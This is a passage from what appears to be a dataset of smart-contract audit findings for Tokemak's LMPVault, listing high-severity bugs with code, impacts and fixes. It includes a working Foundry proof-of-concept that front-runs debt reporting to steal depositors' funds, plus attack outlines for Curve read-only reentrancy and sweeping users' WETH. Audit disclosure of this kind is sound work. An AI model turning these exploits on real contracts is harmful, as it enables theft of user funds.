the time buffer allows time for a bad value to be disputed\\n (, bytes memory data, uint256 timestamp) = tellor.getDataBefore(_queryId, block.timestamp - 20 minutes);\\n uint256 _value = abi.decode(data, (uint256));\\n if (timestamp == 0 || _value == 0) return (false, _value, timestamp);\\n```\\n -ETH deposited by the user may be stolen.чhighчIn the `deposit` function, if the user pays with ETH, it will first call `_processEthIn` to wrap it and then call `pullToken` to transfer.\\n```\\n /// @inheritdoc ILMPVaultRouterBase\\n function deposit(\\n ILMPVault vault,\\n address to,\\n uint256 amount,\\n uint256 minSharesOut\\n ) public payable virtual override returns (uint256 sharesOut) {\\n // handle possible eth\\n _processEthIn(vault);\\n\\n IERC20 vaultAsset = IERC20(vault.asset());\\n pullToken(vaultAsset, amount, address(this));\\n\\n return _deposit(vault, to, amount, minSharesOut);\\n }\\n```\\n\\n`_processEthIn` will wrap ETH into WETH, and these WETH belong to the contract itself.\\n```\\n function _processEthIn(ILMPVault vault) internal {\\n // if any eth sent, wrap it first\\n if (msg.value > 0) {\\n // if asset is not weth, revert\\n if (address(vault.asset()) != address(weth9)) {\\n revert InvalidAsset();\\n }\\n\\n // wrap eth\\n weth9.deposit{ value: msg.value }();\\n }\\n }\\n```\\n\\nHowever, `pullToken` transfers from `msg.sender` and does not use the WETH obtained in `_processEthIn`.\\n```\\n function pullToken(IERC20 token, uint256 amount, address recipient) public payable {\\n token.safeTransferFrom(msg.sender, recipient, amount);\\n }\\n```\\n\\nIf the user deposits 10 ETH and approves 10 WETH to the contract, when the deposit amount is 10, all of the user's 20 WETH will be transferred into the contract.\\nHowever, due to the `amount` being 10, only 10 WETH will be deposited into the vault, and the remaining 10 WETH can be stolen by the attacker using `sweepToken`.\\n```\\n function sweepToken(IERC20 token, uint256 amountMinimum, address 
recipient) public payable {\\n uint256 balanceToken = token.balanceOf(address(this));\\n if (balanceToken < amountMinimum) revert InsufficientToken();\\n\\n if (balanceToken > 0) {\\n token.safeTransfer(recipient, balanceToken);\\n }\\n }\\n```\\n\\nBoth `mint` and `deposit` in `LMPVaultRouterBase` have this problem.чPerform operations based on the size of `msg.value` and amount:\\nmsg.value == amount: transfer WETH from contract not `msg.sender`\\nmsg.value > amount: transfer WETH from contract not `msg.sender` and refund to `msg.sender`\\nmsg.value < amount: transfer WETH from contract and transfer remaining from `msg.sender`чETH deposited by the user may be stolen.ч```\\n /// @inheritdoc ILMPVaultRouterBase\\n function deposit(\\n ILMPVault vault,\\n address to,\\n uint256 amount,\\n uint256 minSharesOut\\n ) public payable virtual override returns (uint256 sharesOut) {\\n // handle possible eth\\n _processEthIn(vault);\\n\\n IERC20 vaultAsset = IERC20(vault.asset());\\n pullToken(vaultAsset, amount, address(this));\\n\\n return _deposit(vault, to, amount, minSharesOut);\\n }\\n```\\n -Destination Vault rewards are not added to idleIncrease when info.totalAssetsPulled > info.totalAssetsToPullчhighчIn the `_withdraw` function, Destination Vault rewards will be first recorded in `info.IdleIncrease` by `info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;`.\\nBut when `info.totalAssetsPulled` > info.totalAssetsToPull, `info.idleIncrease` is directly assigned as `info.totalAssetsPulled` - info.totalAssetsToPull, and `info.totalAssetsPulled` is `assetPulled` without considering Destination Vault rewards.\\n```\\n uint256 assetPreBal = _baseAsset.balanceOf(address(this));\\n uint256 assetPulled = destVault.withdrawBaseAsset(sharesToBurn, address(this));\\n\\n // Destination Vault rewards will be transferred to us as part of burning out shares\\n // Back into what that amount is and make sure it gets into idle\\n info.idleIncrease += 
_baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;\\n info.totalAssetsPulled += assetPulled;\\n info.debtDecrease += totalDebtBurn;\\n\\n // It's possible we'll get back more assets than we anticipate from a swap\\n // so if we do, throw it in idle and stop processing. You don't get more than we've calculated\\n if (info.totalAssetsPulled > info.totalAssetsToPull) {\\n info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n break;\\n }\\n```\\n\\nFor example,\\n```\\n // preBal == 100 pulled == 10 reward == 5 toPull == 6\\n // idleIncrease = 115 - 100 - 10 == 5\\n // totalPulled(0) += assetPulled == 10 > toPull\\n // idleIncrease = totalPulled - toPull == 4 < reward\\n```\\n\\nThe final `info.idleIncrease` does not record the reward, and these assets are not ultimately recorded by the Vault.ч`info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;` -> `info.idleIncrease += info.totalAssetsPulled - info.totalAssetsToPull;`чThe final `info.idleIncrease` does not record the reward, and these assets are not ultimately recorded by the Vault.\\nMeanwhile, due to the `recover` function's inability to extract the `baseAsset`, this will result in no operations being able to handle these Destination Vault rewards, ultimately causing these assets to be frozen within the contract.ч```\\n uint256 assetPreBal = _baseAsset.balanceOf(address(this));\\n uint256 assetPulled = destVault.withdrawBaseAsset(sharesToBurn, address(this));\\n\\n // Destination Vault rewards will be transferred to us as part of burning out shares\\n // Back into what that amount is and make sure it gets into idle\\n info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;\\n info.totalAssetsPulled += assetPulled;\\n info.debtDecrease += totalDebtBurn;\\n\\n // It's possible we'll get back more assets than we anticipate from a swap\\n // so if we do, throw it in idle and stop 
processing. You don't get more than we've calculated\\n if (info.totalAssetsPulled > info.totalAssetsToPull) {\\n info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n break;\\n }\\n```\\n -Liquidations miss delegate call to swapperчhighчThe LiquidationRow contract is an orchestrator for the claiming process. It is primarily used to collect rewards for vaults. It has a method called liquidateVaultsForToken. Based on docs this method is for: Conducts the liquidation process for a specific token across a list of vaults, performing the necessary balance adjustments, initiating the swap process via the asyncSwapper, taking a fee from the received amount, and queues the remaining swapped tokens in the MainRewarder associated with each vault.\\n```\\nfunction liquidateVaultsForToken(\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params\\n) external nonReentrant hasRole(Roles.LIQUIDATOR_ROLE) onlyWhitelistedSwapper(asyncSwapper) {\\n uint256 gasBefore = gasleft();\\n\\n (uint256 totalBalanceToLiquidate, uint256[] memory vaultsBalances) =\\n _prepareForLiquidation(fromToken, vaultsToLiquidate);\\n _performLiquidation(\\n gasBefore, fromToken, asyncSwapper, vaultsToLiquidate, params, totalBalanceToLiquidate, vaultsBalances\\n );\\n}\\n```\\n\\nThe second part of the function is performing the liquidation by calling _performLiquidation. A problem is at the beginning of it. 
IAsyncSwapper is called to swap tokens.\\n```\\nfunction _performLiquidation(\\n uint256 gasBefore,\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params,\\n uint256 totalBalanceToLiquidate,\\n uint256[] memory vaultsBalances\\n) private {\\n uint256 length = vaultsToLiquidate.length;\\n // the swapper checks that the amount received is greater or equal than the params.buyAmount\\n uint256 amountReceived = IAsyncSwapper(asyncSwapper).swap(params);\\n // // rest of code\\n}\\n```\\n\\nAs you can see the LiquidationRow doesn't transfer the tokens to swapper and swapper doesn't pull them either (swap function here). Because of this the function reverts.\\nI noticed that there is no transfer back to LiquidationRow from Swapper either. Tokens can't get in or out.\\nWhen I searched the codebase, I found that Swapper is being called in another place using the delegatecall method. This way it can operate with the tokens of the caller. The call can be found here - LMPVaultRouter.sol:swapAndDepositToVault. So I think that instead of missing transfer, the problem is actually in the way how swapper is called.
Liquidation can't be called because it reverts when Swapper tries to work with tokens it doesn't possess.ч```\\nfunction liquidateVaultsForToken(\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params\\n) external nonReentrant hasRole(Roles.LIQUIDATOR_ROLE) onlyWhitelistedSwapper(asyncSwapper) {\\n uint256 gasBefore = gasleft();\\n\\n (uint256 totalBalanceToLiquidate, uint256[] memory vaultsBalances) =\\n _prepareForLiquidation(fromToken, vaultsToLiquidate);\\n _performLiquidation(\\n gasBefore, fromToken, asyncSwapper, vaultsToLiquidate, params, totalBalanceToLiquidate, vaultsBalances\\n );\\n}\\n```\\n -When `queueNewRewards` is called, caller could transfer tokens more than it should beчhighчInside `queueNewRewards`, irrespective of whether we're near the start or the end of a reward period, if the accrued rewards are too large relative to the new rewards (queuedRatio is greater than newRewardRatio), the new rewards will be added to the queue (queuedRewards) rather than being immediately distributed.\\n```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards += startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number - (periodInBlockFinish - durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), 
newRewards);\\n }\\n```\\n\\nHowever, when this function tried to pull funds from sender via `safeTransferFrom`, it used `newRewards` amount, which already added by `startingQueuedRewards`. If previously `queuedRewards` already have value, the processed amount will be wrong.чUpdate the transfer to use `startingNewRewards` instead of `newRewards` :\\n```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 startingNewRewards = newRewards;\\n\\n newRewards // Add the line below\\n= startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number // Remove the line below\\n (periodInBlockFinish // Remove the line below\\n durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n// Remove the line below\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n// Add the line below\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), startingNewRewards);\\n }\\n```\\nчThere are two possible issue here :\\nIf previously `queuedRewards` is not 0, and the caller don't have enough funds or approval, the call will revert due to this logic error.\\nIf previously `queuedRewards` is not 0, and the caller have enough funds and approval, the caller funds will be pulled more than it should (reward param + `queuedRewards` )ч```\\n function queueNewRewards(uint256 newRewards) external onlyWhitelisted {\\n uint256 startingQueuedRewards = queuedRewards;\\n uint256 
startingNewRewards = newRewards;\\n\\n newRewards += startingQueuedRewards;\\n\\n if (block.number >= periodInBlockFinish) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n uint256 elapsedBlock = block.number - (periodInBlockFinish - durationInBlock);\\n uint256 currentAtNow = rewardRate * elapsedBlock;\\n uint256 queuedRatio = currentAtNow * 1000 / newRewards;\\n\\n if (queuedRatio < newRewardRatio) {\\n notifyRewardAmount(newRewards);\\n queuedRewards = 0;\\n } else {\\n queuedRewards = newRewards;\\n }\\n }\\n\\n emit QueuedRewardsUpdated(startingQueuedRewards, startingNewRewards, queuedRewards);\\n\\n // Transfer the new rewards from the caller to this contract.\\n IERC20(rewardToken).safeTransferFrom(msg.sender, address(this), newRewards);\\n }\\n```\\n -Curve V2 Vaults can be drained because CurveV2CryptoEthOracle can be reentered with WETH tokensчhighч`CurveV2CryptoEthOracle.registerPool` takes `checkReentrancy` parameters and this should be True only for pools that have `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` tokens and this is validated here.\\n```\\naddress public constant ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n\\n// rest of code\\n\\n// Only need ability to check for read-only reentrancy for pools containing native Eth.\\nif (checkReentrancy) {\\n if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n}\\n```\\n\\nThis Oracle is meant for Curve V2 pools and the ones I've seen so far use WETH address instead of `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` (like Curve V1) and this applies to all pools listed by Tokemak.\\nFor illustration, I'll use the same pool used to test proper registration. The test is for `CRV_ETH_CURVE_V2_POOL` but this applies to other V2 pools including rETH/ETH. 
The pool address for `CRV_ETH_CURVE_V2_POOL` is 0x8301AE4fc9c624d1D396cbDAa1ed877821D7C511 while token address is 0xEd4064f376cB8d68F770FB1Ff088a3d0F3FF5c4d.\\nIf you interact with the pool, the coins are: 0 - WETH - 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 1 - CRV - 0xD533a949740bb3306d119CC777fa900bA034cd52\\nSo how can WETH be reentered?! Because Curve can accept ETH for WETH pools.\\nA look at the pool again shows that Curve uses python kwargs and it includes a variable `use_eth` for `exchange`, `add_liquidity`, `remove_liquidity` and `remove_liquidity_one_coin`.\\n```\\ndef exchange(i: uint256, j: uint256, dx: uint256, min_dy: uint256, use_eth: bool = False) -> uint256:\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256, use_eth: bool = False) -> uint256:\\ndef remove_liquidity(_amount: uint256, min_amounts: uint256[N_COINS], use_eth: bool = False):\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256, use_eth: bool = False) -> uint256:\\n```\\n\\nWhen `use_eth` is `true`, it would take `msg.value` instead of transfer WETH from user. And it would make a raw call instead of transfer WETH to user.\\nIf raw call is sent to user, then they could reenter LMP vault and attack the protocol and it would be successful cause CurveV2CryptoEthOracle would not check for reentrancy in getPriceInEth\\n```\\n// Checking for read only reentrancy scenario.\\nif (poolInfo.checkReentrancy == 1) {\\n // This will fail in a reentrancy situation.\\n cryptoPool.claim_admin_fees();\\n}\\n```\\n\\nA profitable attack that could be used to drain the vault involves\\nDeposit shares at fair price\\nRemove liquidity on Curve and updateDebtReporting in LMPVault with view only reentrancy\\nWithdraw shares at unfair priceчIf CurveV2CryptoEthOracle is meant for CurveV2 pools with WETH (and no 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE), then change the ETH address to weth. 
As far as I can tell Curve V2 uses WETH address for ETH but this needs to be verified.\\n```\\n- if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n+ if (tokens[0] != WETH && tokens[1] != WETH) revert MustHaveEthForReentrancy();\\n```\\nчThe protocol could be attacked with price manipulation using Curve read only reentrancy. The consequence would be fatal because `getPriceInEth` is used for evaluating debtValue and this evaluation decides shares and debt that would be burned in a withdrawal. Therefore, an inflated value allows attacker to withdraw too many assets for their shares. This could be abused to drain assets on LMPVault.\\nThe attack is cheap, easy and could be bundled in as a flashloan attack. And it puts the whole protocol at risk because a large portion of their deposit would be on Curve V2 pools with WETH token.ч```\\naddress public constant ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n\\n// rest of code\\n\\n// Only need ability to check for read-only reentrancy for pools containing native Eth.\\nif (checkReentrancy) {\\n if (tokens[0] != ETH && tokens[1] != ETH) revert MustHaveEthForReentrancy();\\n}\\n```\\n -updateDebtReporting can be front run, putting all the loss on later withdrawals but taking the profitчhighчupdateDebtReporting takes in a user input of destinations in array whose debt to report, so if a destination vault is incurring loss and is not on the front of withdrawalQueue then an attacker can just update debt for only the destinations which are incurring a profit and withdraw in the same txn.
He will exit the vault with profit, others who withdraw after the legit updateDebtReporting txn will suffer even more loss than they should have, as some part of the profit which was used to offset the loss was taken by the attacker and protocol fees\\nPOC-\\nLMPVault has 2000 in deposits 1000 from alice and 1000 from bob\\nVault has invested that in 1000 in DestinationVault1 & 1000 in DestinationVault2 (no idle for simple calculations)\\nNow Dv1 gains a profit of 5%(+50 base asset) while Dv2 is in 10% loss(-100 base asset)\\nSo vault has net loss of 50. Now alice does an updateDebtReporting([Dv1]) and not including Dv2 in the input array.\\nNow she withdraws her money, protocol now falsely believes there is a profit, it also takes 20% profit fees(assumed) and mints 10 shares for itself and alice walks away with roughly 1020 assets, incurring no loss\\nNow a legit updateDebtReporting txn comes and bob has to account for the loss
run it via the command\\n```\\nforge test --match-path test/vault/LMPVault-Withdraw.t.sol --match-test test_AvoidTheLoss -vv\\n```\\n\\n```\\nfunction test_AvoidTheLoss() public {\\n\\n// for simplicity sake, i'll be assuming vault keeps nothing idle\\n\\n// as it does not affect the attack vector in any ways\\n\\n_accessController.grantRole(Roles.SOLVER_ROLE, address(this));\\n\\n_accessController.grantRole(Roles.LMP_FEE_SETTER_ROLE, address(this));\\n\\naddress feeSink = vm.addr(555);\\n\\n_lmpVault.setFeeSink(feeSink);\\n\\n_lmpVault.setPerformanceFeeBps(2000); // 20%\\n\\naddress alice = address(789);\\n\\nuint initialBalanceAlice = 1000;\\n\\n// User is going to deposit 1000 asset\\n\\n_asset.mint(address(this), 1000);\\n\\n_asset.approve(address(_lmpVault), 1000);\\n\\nuint shareBalUser = _lmpVault.deposit(1000, address(this));\\n\\n_underlyerOne.mint(address(this),500);\\n\\n_underlyerOne.approve(address(_lmpVault),500);\\n\\n_lmpVault.rebalance(\\n\\naddress(_destVaultOne),\\n\\naddress(_underlyerOne),\\n\\n500,\\n\\naddress(0),\\n\\naddress(_asset),\\n\\n1000\\n\\n);\\n\\n_asset.mint(alice,initialBalanceAlice);\\n\\nvm.startPrank(alice);\\n\\n_asset.approve(address(_lmpVault),initialBalanceAlice);\\n\\nuint shareBalAlice = _lmpVault.deposit(initialBalanceAlice,alice);\\n\\nvm.stopPrank();\\n\\n// rebalance to 2nd vault\\n\\n_underlyerTwo.mint(address(this), 1000);\\n\\n_underlyerTwo.approve(address(_lmpVault),1000);\\n\\n_lmpVault.rebalance(\\n\\naddress(_destVaultTwo),\\n\\naddress(_underlyerTwo),\\n\\n1000,\\n\\naddress(0),\\n\\naddress(_asset),\\n\\n1000\\n\\n);\\n\\n// the second destVault incurs loss, 10%\\n\\n_mockRootPrice(address(_underlyerTwo), 0.9 ether);\\n\\n \\n\\n// the first vault incurs some profit, 5%\\n\\n// so lmpVault is in netLoss of 50 baseAsset\\n\\n_mockRootPrice(address(_underlyerOne), 2.1 ether);\\n\\n// malicious updateDebtReporting by alice\\n\\naddress[] memory alteredDestinations = new address[](1);\\n\\nalteredDestinations[0] 
= address(_destVaultOne);\\n\\nvm.prank(alice);\\n\\n_lmpVault.updateDebtReporting(alteredDestinations);\\n\\n \\n\\n// alice withdraws first\\n\\nvm.prank(alice);\\n\\n_lmpVault.redeem(shareBalAlice , alice,alice);\\n\\nuint finalBalanceAlice = _asset.balanceOf(alice);\\n\\nemit log_named_uint(\"final Balance of alice \", finalBalanceAlice);\\n\\n// protocol also collects its fees\\n\\n// further wrecking the remaining LPs\\n\\nemit log_named_uint(\"Fees shares give to feeSink \", _lmpVault.balanceOf(feeSink));\\n\\nassertGt( finalBalanceAlice, initialBalanceAlice);\\n\\nassertGt(_lmpVault.balanceOf(feeSink), 0);\\n\\n// now updateDebtReporting again but for all DVs\\n\\n_lmpVault.updateDebtReporting(_destinations);\\n\\n \\n\\nemit log_named_uint(\"Remaining LPs can only get \",_lmpVault.maxWithdraw(address(this)));\\n\\nemit log_named_uint(\"Protocol falsely earned(in base asset)\", _lmpVault.maxWithdraw(feeSink));\\n\\nemit log_named_uint(\"Vault totalAssets\" , _lmpVault.totalAssets());\\n\\nemit log_named_uint(\"Effective loss take by LPs\", 1000 - _lmpVault.maxWithdraw(address(this)));\\n\\nemit log_named_uint(\"Profit for Alice\",_asset.balanceOf(alice) - initialBalanceAlice);\\n\\n}\\n```\\n\\nLogs: final Balance of alice : 1019 Fees shares give to feeSink : 10 Remaining LPs can only get : 920 Protocol falsely earned(in base asset): 9 Vault totalAssets: 930 Effective loss take by LPs: 80 Profit for Alice: 19чupdateDebtReporting should not have any input param, should by default update for all added destination vaultsчTheft of user funds. 
Submitting as high as attacker only needs to frontrun a updateDebtReporting txn with malicious input and withdraw his funds.ч```\\nforge test --match-path test/vault/LMPVault-Withdraw.t.sol --match-test test_AvoidTheLoss -vv\\n```\\n -Inflated price due to unnecessary precision scalingчhighчThe `price` at Line 137 below is denominated in 18 decimals as the `getPriceInEth` function always returns the `price` in 18 decimals precision.\\nThere is no need to scale the accumulated price by 1e18.\\nIt will cause the average price (existing._initAcc) to be inflated significantly\\nThe numerator will almost always be larger than the denominator (INIT_SAMPLE_COUNT = 18). There is no risk of it rounding to zero, so any scaling is unnecessary.\\nAssume that throughout the initialization process, the `getPriceInEth(XYZ)` always returns 2 ETH (2e18). After 18 rounds (INIT_SAMPLE_COUNT == 18) of initialization, `existing._initAcc` will equal 36 ETH (36e18). As such, the `averagePrice` will be as follows:\\n```\\naveragePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\naveragePrice = 36e18 * 1e18 / 18\\naveragePrice = 36e36 / 18\\naveragePrice = 2e36\\n```\\n\\n`existing.fastFilterPrice` and `existing.slowFilterPrice` will be set to `2e36` at Lines 157 and 158 below.\\nIn the post-init phase, the `getPriceInEth` function return 3 ETH (3e18). 
Thus, the following code will be executed at Lines 144 and 155 below:\\n```\\nexisting.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, existing.slowFilterPrice, price);\\nexisting.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, existing.fastFilterPrice, price);\\n\\nexisting.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, 2e36, 3e18); // SLOW_ALPHA = 645e14; // 0.0645\\nexisting.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, 2e36, 3e18); // FAST_ALPHA = 33e16; // 0.33\\n```\\n\\nAs shown above, the existing filter prices are significantly inflated by the scale of 1e18, which results in the prices being extremely skewed.\\nUsing the formula of the fast filter, the final fast filter price computed will be as follows:\\n```\\n((priorValue * (1e18 - alpha)) + (currentValue * alpha)) / 1e18\\n((priorValue * (1e18 - 33e16)) + (currentValue * 33e16)) / 1e18\\n((priorValue * 67e16) + (currentValue * 33e16)) / 1e18\\n((2e36 * 67e16) + (3e18 * 33e16)) / 1e18\\n1.34e36 (1340000000000000000 ETH)\\n```\\n\\nThe token is supposed only to be worth around 3 ETH. 
However, the fast filter price wrongly determine that it is worth around 1340000000000000000 ETH\\n```\\nFile: IncentivePricingStats.sol\\n function updatePricingInfo(IRootPriceOracle pricer, address token) internal {\\n..SNIP..\\n uint256 price = pricer.getPriceInEth(token);\\n\\n // update the timestamp no matter what phase we're in\\n existing.lastSnapshot = uint40(block.timestamp);\\n\\n if (existing._initComplete) {\\n // post-init phase, just update the filter values\\n existing.slowFilterPrice = Stats.getFilteredValue(SLOW_ALPHA, existing.slowFilterPrice, price);\\n existing.fastFilterPrice = Stats.getFilteredValue(FAST_ALPHA, existing.fastFilterPrice, price);\\n } else {\\n // still the initialization phase\\n existing._initCount += 1;\\n existing._initAcc += price;\\n\\n // snapshot count is tracked internally and cannot be manipulated\\n // slither-disable-next-line incorrect-equality\\n if (existing._initCount == INIT_SAMPLE_COUNT) { // @audit-info INIT_SAMPLE_COUNT = 18;\\n // if this sample hits the target number, then complete initialize and set the filters\\n existing._initComplete = true;\\n uint256 averagePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\n existing.fastFilterPrice = averagePrice;\\n existing.slowFilterPrice = averagePrice;\\n }\\n }\\n```\\nчRemove the 1e18 scaling.\\n```\\nif (existing._initCount == INIT_SAMPLE_COUNT) {\\n // if this sample hits the target number, then complete initialize and set the filters\\n existing._initComplete = true;\\n// Remove the line below\\n uint256 averagePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\n// Add the line below\\n uint256 averagePrice = existing._initAcc / INIT_SAMPLE_COUNT;\\n existing.fastFilterPrice = averagePrice;\\n existing.slowFilterPrice = averagePrice;\\n}\\n```\\nчThe price returned by the stat calculators will be excessively inflated. The purpose of the stats/calculators contracts is to store, augment, and clean data relevant to the LMPs. 
When the solver proposes a rebalance, the strategy uses the stats contracts to calculate a composite return (score) for the proposed destinations. Using that composite return, it determines if the swap is beneficial for the vault.\\nIf a stat calculator provides incorrect and inflated pricing, it can cause multiple implications that lead to losses to the protocol, such as false signals allowing the unprofitable rebalance to be executed.ч```\\naveragePrice = existing._initAcc * 1e18 / INIT_SAMPLE_COUNT;\\naveragePrice = 36e18 * 1e18 / 18\\naveragePrice = 36e36 / 18\\naveragePrice = 2e36\\n```\\n -Immediately start getting rewards belonging to others after stakingчhighчNote This issue affects both LMPVault and DV since they use the same underlying reward contract.\\nAssume a new user called Bob mints 100 LMPVault or DV shares. The ERC20's `_mint` function will be called, which will first increase Bob's balance at Line 267 and then trigger the `_afterTokenTransfer` hook at Line 271.\\n```\\nFile: ERC20.sol\\n function _mint(address account, uint256 amount) internal virtual {\\n..SNIP..\\n _beforeTokenTransfer(address(0), account, amount);\\n\\n _totalSupply += amount;\\n unchecked {\\n // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.\\n _balances[account] += amount;\\n }\\n..SNIP..\\n _afterTokenTransfer(address(0), account, amount);\\n }\\n```\\n\\nThe `_afterTokenTransfer` hook will automatically stake the newly minted shares to the rewarder contracts on behalf of Bob.\\n```\\nFile: LMPVault.sol\\n function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual override {\\n..SNIP..\\n if (to != address(0)) {\\n rewarder.stake(to, amount);\\n }\\n }\\n```\\n\\nWithin the `MainRewarder.stake` function, it will first call the `_updateReward` function at Line 87 to take a snapshot of accumulated rewards. Since Bob is a new user, his accumulated rewards should be zero. 
However, this turned out to be false due to the bug described in this report.\\n```\\nFile: MainRewarder.sol\\n function stake(address account, uint256 amount) public onlyStakeTracker {\\n _updateReward(account);\\n _stake(account, amount);\\n\\n for (uint256 i = 0; i < extraRewards.length; ++i) {\\n IExtraRewarder(extraRewards[i]).stake(account, amount);\\n }\\n }\\n```\\n\\nWhen the `_updateReward` function is executed, it will compute Bob's earned rewards. It is important to note that at this point, Bob's balance has already been updated to 100 shares in the `stakeTracker` contract, and `userRewardPerTokenPaid[Bob]` is zero.\\nBob's earned reward will be as follows, where $r$ is the rewardPerToken():\\n$$ earned(Bob) = 100\\ {shares \\times (r - 0)} = 100r $$\\nBob immediately accumulated a reward of $100r$ upon staking into the rewarder contract, which is incorrect. Bob could withdraw $100r$ reward tokens that do not belong to him.\\n```\\nFile: AbstractRewarder.sol\\n function _updateReward(address account) internal {\\n uint256 earnedRewards = 0;\\n rewardPerTokenStored = rewardPerToken();\\n lastUpdateBlock = lastBlockRewardApplicable();\\n\\n if (account != address(0)) {\\n earnedRewards = earned(account);\\n rewards[account] = earnedRewards;\\n userRewardPerTokenPaid[account] = rewardPerTokenStored;\\n }\\n\\n emit UserRewardUpdated(account, earnedRewards, rewardPerTokenStored, lastUpdateBlock);\\n }\\n..SNIP..\\n function balanceOf(address account) public view returns (uint256) {\\n return stakeTracker.balanceOf(account);\\n }\\n..SNIP..\\n function earned(address account) public view returns (uint256) {\\n return (balanceOf(account) * (rewardPerToken() - userRewardPerTokenPaid[account]) / 1e18) + rewards[account];\\n }\\n```\\nчEnsure that the balance of the users in the rewarder contract is only incremented after the `_updateReward` function is executed.\\nOne option is to track the balance of the staker and total supply internally within the rewarder 
contract and avoid reading the states in the `stakeTracker` contract, commonly seen in many reward contracts.\\n```\\nFile: AbstractRewarder.sol\\nfunction balanceOf(address account) public view returns (uint256) {\\n// Remove the line below\\n return stakeTracker.balanceOf(account);\\n// Add the line below\\n return _balances[account];\\n}\\n```\\n\\n```\\nFile: AbstractRewarder.sol\\nfunction _stake(address account, uint256 amount) internal {\\n Errors.verifyNotZero(account, \"account\");\\n Errors.verifyNotZero(amount, \"amount\");\\n \\n// Add the line below\\n _totalSupply // Add the line below\\n= amount\\n// Add the line below\\n _balances[account] // Add the line below\\n= amount\\n\\n emit Staked(account, amount);\\n}\\n```\\nчLoss of reward tokens for the vault shareholders.ч```\\nFile: ERC20.sol\\n function _mint(address account, uint256 amount) internal virtual {\\n..SNIP..\\n _beforeTokenTransfer(address(0), account, amount);\\n\\n _totalSupply += amount;\\n unchecked {\\n // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.\\n _balances[account] += amount;\\n }\\n..SNIP..\\n _afterTokenTransfer(address(0), account, amount);\\n }\\n```\\n -Differences between actual and cached total assets can be arbitragedчhighчThe actual total amount of assets that are owned by a LMPVault on-chain can be derived via the following formula:\\n$$ totalAssets_{actual} = \\sum_{n=1}^{x}debtValue(DV_n) $$\\nWhen `LMPVault.totalAssets()` function is called, it returns the cached total assets of the LMPVault instead.\\n$$ totalAssets_{cached} = totalIdle + totalDebt $$\\n```\\nFile: LMPVault.sol\\n function totalAssets() public view override returns (uint256) {\\n return totalIdle + totalDebt;\\n }\\n```\\n\\nThus, the $totalAssets_{cached}$ will deviate from $totalAssets_{actual}$. 
